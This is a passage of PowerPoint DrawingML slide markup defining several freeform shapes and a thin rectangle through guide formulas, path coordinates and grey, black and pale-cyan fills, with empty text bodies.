                  <a:gd name="T1" fmla="*/ 0 h 36"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 0 h 36"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 36"/>
                  <a:gd name="T6" fmla="*/ 8 w 9"/>
                  <a:gd name="T7" fmla="*/ 3 h 36"/>
                  <a:gd name="T8" fmla="*/ 7 w 9"/>
                  <a:gd name="T9" fmla="*/ 6 h 36"/>
                  <a:gd name="T10" fmla="*/ 6 w 9"/>
                  <a:gd name="T11" fmla="*/ 10 h 36"/>
                  <a:gd name="T12" fmla="*/ 6 w 9"/>
                  <a:gd name="T13" fmla="*/ 17 h 36"/>
                  <a:gd name="T14" fmla="*/ 6 w 9"/>
                  <a:gd name="T15" fmla="*/ 26 h 36"/>
                  <a:gd name="T16" fmla="*/ 7 w 9"/>
                  <a:gd name="T17" fmla="*/ 36 h 36"/>
                  <a:gd name="T18" fmla="*/ 2 w 9"/>
                  <a:gd name="T19" fmla="*/ 36 h 36"/>
                  <a:gd name="T20" fmla="*/ 1 w 9"/>
                  <a:gd name="T21" fmla="*/ 36 h 36"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 33 h 36"/>
                  <a:gd name="T24" fmla="*/ 1 w 9"/>
                  <a:gd name="T25" fmla="*/ 28 h 36"/>
                  <a:gd name="T26" fmla="*/ 0 w 9"/>
                  <a:gd name="T27" fmla="*/ 22 h 36"/>
                  <a:gd name="T28" fmla="*/ 0 w 9"/>
                  <a:gd name="T29" fmla="*/ 16 h 36"/>
                  <a:gd name="T30" fmla="*/ 0 w 9"/>
                  <a:gd name="T31" fmla="*/ 10 h 36"/>
                  <a:gd name="T32" fmla="*/ 1 w 9"/>
                  <a:gd name="T33" fmla="*/ 5 h 36"/>
                  <a:gd name="T34" fmla="*/ 3 w 9"/>
                  <a:gd name="T35" fmla="*/ 0 h 36"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 0 h 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36"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>
                  <a:gd name="T60" fmla="*/ 36 h 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36">
                    <a:moveTo>
                      <a:pt x="9" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="BFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10642" name="Rectangle 49"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="2823"/>
                <a:ext cx="4" cy="118"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10643" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1290" y="2820"/>
                <a:ext cx="46" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 46"/>
                  <a:gd name="T1" fmla="*/ 6 h 55"/>
                  <a:gd name="T2" fmla="*/ 4 w 46"/>
                  <a:gd name="T3" fmla="*/ 7 h 55"/>
                  <a:gd name="T4" fmla="*/ 3 w 46"/>
                  <a:gd name="T5" fmla="*/ 10 h 55"/>
                  <a:gd name="T6" fmla="*/ 1 w 46"/>
                  <a:gd name="T7" fmla="*/ 14 h 55"/>
                  <a:gd name="T8" fmla="*/ 0 w 46"/>
                  <a:gd name="T9" fmla="*/ 20 h 55"/>
                  <a:gd name="T10" fmla="*/ 0 w 46"/>
                  <a:gd name="T11" fmla="*/ 28 h 55"/>
                  <a:gd name="T12" fmla="*/ 0 w 46"/>
                  <a:gd name="T13" fmla="*/ 36 h 55"/>
                  <a:gd name="T14" fmla="*/ 0 w 46"/>
                  <a:gd name="T15" fmla="*/ 46 h 55"/>
                  <a:gd name="T16" fmla="*/ 3 w 46"/>
                  <a:gd name="T17" fmla="*/ 55 h 55"/>
                  <a:gd name="T18" fmla="*/ 3 w 46"/>
                  <a:gd name="T19" fmla="*/ 54 h 55"/>
                  <a:gd name="T20" fmla="*/ 3 w 46"/>
                  <a:gd name="T21" fmla="*/ 53 h 55"/>
                  <a:gd name="T22" fmla="*/ 3 w 46"/>
                  <a:gd name="T23" fmla="*/ 52 h 55"/>
                  <a:gd name="T24" fmla="*/ 3 w 46"/>
                  <a:gd name="T25" fmla="*/ 49 h 55"/>
                  <a:gd name="T26" fmla="*/ 3 w 46"/>
                  <a:gd name="T27" fmla="*/ 46 h 55"/>
                  <a:gd name="T28" fmla="*/ 4 w 46"/>
                  <a:gd name="T29" fmla="*/ 42 h 55"/>
                  <a:gd name="T30" fmla="*/ 4 w 46"/>
                  <a:gd name="T31" fmla="*/ 39 h 55"/>
                  <a:gd name="T32" fmla="*/ 5 w 46"/>
                  <a:gd name="T33" fmla="*/ 35 h 55"/>
                  <a:gd name="T34" fmla="*/ 6 w 46"/>
                  <a:gd name="T35" fmla="*/ 32 h 55"/>
                  <a:gd name="T36" fmla="*/ 7 w 46"/>
                  <a:gd name="T37" fmla="*/ 28 h 55"/>
                  <a:gd name="T38" fmla="*/ 8 w 46"/>
                  <a:gd name="T39" fmla="*/ 25 h 55"/>
                  <a:gd name="T40" fmla="*/ 11 w 46"/>
                  <a:gd name="T41" fmla="*/ 21 h 55"/>
                  <a:gd name="T42" fmla="*/ 14 w 46"/>
                  <a:gd name="T43" fmla="*/ 19 h 55"/>
                  <a:gd name="T44" fmla="*/ 17 w 46"/>
                  <a:gd name="T45" fmla="*/ 17 h 55"/>
                  <a:gd name="T46" fmla="*/ 21 w 46"/>
                  <a:gd name="T47" fmla="*/ 14 h 55"/>
                  <a:gd name="T48" fmla="*/ 26 w 46"/>
                  <a:gd name="T49" fmla="*/ 14 h 55"/>
                  <a:gd name="T50" fmla="*/ 26 w 46"/>
                  <a:gd name="T51" fmla="*/ 13 h 55"/>
                  <a:gd name="T52" fmla="*/ 26 w 46"/>
                  <a:gd name="T53" fmla="*/ 13 h 55"/>
                  <a:gd name="T54" fmla="*/ 28 w 46"/>
                  <a:gd name="T55" fmla="*/ 12 h 55"/>
                  <a:gd name="T56" fmla="*/ 29 w 46"/>
                  <a:gd name="T57" fmla="*/ 11 h 55"/>
                  <a:gd name="T58" fmla="*/ 33 w 46"/>
                  <a:gd name="T59" fmla="*/ 10 h 55"/>
                  <a:gd name="T60" fmla="*/ 36 w 46"/>
                  <a:gd name="T61" fmla="*/ 7 h 55"/>
                  <a:gd name="T62" fmla="*/ 41 w 46"/>
                  <a:gd name="T63" fmla="*/ 5 h 55"/>
                  <a:gd name="T64" fmla="*/ 46 w 46"/>
                  <a:gd name="T65" fmla="*/ 3 h 55"/>
                  <a:gd name="T66" fmla="*/ 46 w 46"/>
                  <a:gd name="T67" fmla="*/ 3 h 55"/>
                  <a:gd name="T68" fmla="*/ 45 w 46"/>
                  <a:gd name="T69" fmla="*/ 3 h 55"/>
                  <a:gd name="T70" fmla="*/ 43 w 46"/>
                  <a:gd name="T71" fmla="*/ 3 h 55"/>
                  <a:gd name="T72" fmla="*/ 42 w 46"/>
                  <a:gd name="T73" fmla="*/ 1 h 55"/>
                  <a:gd name="T74" fmla="*/ 40 w 46"/>
                  <a:gd name="T75" fmla="*/ 1 h 55"/>
                  <a:gd name="T76" fmla="*/ 38 w 46"/>
                  <a:gd name="T77" fmla="*/ 1 h 55"/>
                  <a:gd name="T78" fmla="*/ 35 w 46"/>
                  <a:gd name="T79" fmla="*/ 1 h 55"/>
                  <a:gd name="T80" fmla="*/ 32 w 46"/>
                  <a:gd name="T81" fmla="*/ 0 h 55"/>
                  <a:gd name="T82" fmla="*/ 28 w 46"/>
                  <a:gd name="T83" fmla="*/ 0 h 55"/>
                  <a:gd name="T84" fmla="*/ 26 w 46"/>
                  <a:gd name="T85" fmla="*/ 0 h 55"/>
                  <a:gd name="T86" fmla="*/ 22 w 46"/>
                  <a:gd name="T87" fmla="*/ 1 h 55"/>
                  <a:gd name="T88" fmla="*/ 19 w 46"/>
                  <a:gd name="T89" fmla="*/ 1 h 55"/>
                  <a:gd name="T90" fmla="*/ 14 w 46"/>
                  <a:gd name="T91" fmla="*/ 1 h 55"/>
                  <a:gd name="T92" fmla="*/ 11 w 46"/>
                  <a:gd name="T93" fmla="*/ 3 h 55"/>
                  <a:gd name="T94" fmla="*/ 7 w 46"/>
                  <a:gd name="T95" fmla="*/ 4 h 55"/>
                  <a:gd name="T96" fmla="*/ 4 w 46"/>
                  <a:gd name="T97" fmla="*/ 6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6"/>
                  <a:gd name="T148" fmla="*/ 0 h 55"/>
                  <a:gd name="T149" fmla="*/ 46 w 46"/>
                  <a:gd name="T150" fmla="*/ 55 h 5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6" h="55">
                    <a:moveTo>
                      <a:pt x="4" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10644" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1226" y="2861"/>
                <a:ext cx="37" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 6 h 9"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 6 h 9"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 5 h 9"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 5 h 9"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 4 h 9"/>
                  <a:gd name="T12" fmla="*/ 4 w 37"/>
                  <a:gd name="T13" fmla="*/ 2 h 9"/>
                  <a:gd name="T14" fmla="*/ 5 w 37"/>
                  <a:gd name="T15" fmla="*/ 2 h 9"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 1 h 9"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 0 h 9"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 9"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 9"/>
                  <a:gd name="T24" fmla="*/ 19 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 9"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 9"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 1 h 9"/>
                  <a:gd name="T30" fmla="*/ 32 w 37"/>
                  <a:gd name="T31" fmla="*/ 1 h 9"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 4 h 9"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 6 h 9"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 6 h 9"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 5 h 9"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 5 h 9"/>
                  <a:gd name="T42" fmla="*/ 33 w 37"/>
                  <a:gd name="T43" fmla="*/ 5 h 9"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 4 h 9"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 4 h 9"/>
                  <a:gd name="T48" fmla="*/ 25 w 37"/>
                  <a:gd name="T49" fmla="*/ 2 h 9"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 2 h 9"/>
                  <a:gd name="T52" fmla="*/ 19 w 37"/>
                  <a:gd name="T53" fmla="*/ 2 h 9"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 2 h 9"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 2 h 9"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 4 h 9"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 5 h 9"/>
                  <a:gd name="T62" fmla="*/ 5 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 9"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 7 h 9"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 9 h 9"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 6 h 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9"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 9 h 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9">
                    <a:moveTo>
                      <a:pt x="0" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10645" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1226" y="2837"/>
                <a:ext cx="37" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 37"/>
                  <a:gd name="T1" fmla="*/ 5 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 37"/>
                  <a:gd name="T3" fmla="*/ 5 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 37"/>
                  <a:gd name="T5" fmla="*/ 5 h 10"/>
                  <a:gd name="T6" fmla="*/ 1 w 37"/>
                  <a:gd name="T7" fmla="*/ 5 h 10"/>
                  <a:gd name="T8" fmla="*/ 1 w 37"/>
                  <a:gd name="T9" fmla="*/ 4 h 10"/>
                  <a:gd name="T10" fmla="*/ 2 w 37"/>
                  <a:gd name="T11" fmla="*/ 3 h 10"/>
                  <a:gd name="T12" fmla="*/ 4 w 37"/>
                  <a:gd name="T13" fmla="*/ 3 h 10"/>
                  <a:gd name="T14" fmla="*/ 5 w 37"/>
                  <a:gd name="T15" fmla="*/ 2 h 10"/>
                  <a:gd name="T16" fmla="*/ 7 w 37"/>
                  <a:gd name="T17" fmla="*/ 1 h 10"/>
                  <a:gd name="T18" fmla="*/ 9 w 37"/>
                  <a:gd name="T19" fmla="*/ 1 h 10"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 10"/>
                  <a:gd name="T22" fmla="*/ 15 w 37"/>
                  <a:gd name="T23" fmla="*/ 0 h 10"/>
                  <a:gd name="T24" fmla="*/ 19 w 37"/>
                  <a:gd name="T25" fmla="*/ 0 h 10"/>
                  <a:gd name="T26" fmla="*/ 22 w 37"/>
                  <a:gd name="T27" fmla="*/ 0 h 10"/>
                  <a:gd name="T28" fmla="*/ 27 w 37"/>
                  <a:gd name="T29" fmla="*/ 1 h 10"/>
                  <a:gd name="T30" fmla="*/ 32 w 37"/>
                  <a:gd name="T31" fmla="*/ 2 h 10"/>
                  <a:gd name="T32" fmla="*/ 37 w 37"/>
                  <a:gd name="T33" fmla="*/ 3 h 10"/>
                  <a:gd name="T34" fmla="*/ 37 w 37"/>
                  <a:gd name="T35" fmla="*/ 5 h 10"/>
                  <a:gd name="T36" fmla="*/ 36 w 37"/>
                  <a:gd name="T37" fmla="*/ 5 h 10"/>
                  <a:gd name="T38" fmla="*/ 36 w 37"/>
                  <a:gd name="T39" fmla="*/ 4 h 10"/>
                  <a:gd name="T40" fmla="*/ 34 w 37"/>
                  <a:gd name="T41" fmla="*/ 4 h 10"/>
                  <a:gd name="T42" fmla="*/ 33 w 37"/>
                  <a:gd name="T43" fmla="*/ 4 h 10"/>
                  <a:gd name="T44" fmla="*/ 30 w 37"/>
                  <a:gd name="T45" fmla="*/ 3 h 10"/>
                  <a:gd name="T46" fmla="*/ 28 w 37"/>
                  <a:gd name="T47" fmla="*/ 3 h 10"/>
                  <a:gd name="T48" fmla="*/ 25 w 37"/>
                  <a:gd name="T49" fmla="*/ 3 h 10"/>
                  <a:gd name="T50" fmla="*/ 22 w 37"/>
                  <a:gd name="T51" fmla="*/ 2 h 10"/>
                  <a:gd name="T52" fmla="*/ 19 w 37"/>
                  <a:gd name="T53" fmla="*/ 2 h 10"/>
                  <a:gd name="T54" fmla="*/ 15 w 37"/>
                  <a:gd name="T55" fmla="*/ 2 h 10"/>
                  <a:gd name="T56" fmla="*/ 13 w 37"/>
                  <a:gd name="T57" fmla="*/ 2 h 10"/>
                  <a:gd name="T58" fmla="*/ 9 w 37"/>
                  <a:gd name="T59" fmla="*/ 3 h 10"/>
                  <a:gd name="T60" fmla="*/ 7 w 37"/>
                  <a:gd name="T61" fmla="*/ 4 h 10"/>
                  <a:gd name="T62" fmla="*/ 5 w 37"/>
                  <a:gd name="T63" fmla="*/ 5 h 10"/>
                  <a:gd name="T64" fmla="*/ 2 w 37"/>
                  <a:gd name="T65" fmla="*/ 8 h 10"/>
                  <a:gd name="T66" fmla="*/ 0 w 37"/>
                  <a:gd name="T67" fmla="*/ 10 h 10"/>
                  <a:gd name="T68" fmla="*/ 0 w 37"/>
                  <a:gd name="T69" fmla="*/ 5 h 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0"/>
                  <a:gd name="T107" fmla="*/ 37 w 37"/>
                  <a:gd name="T108" fmla="*/ 10 h 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0">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
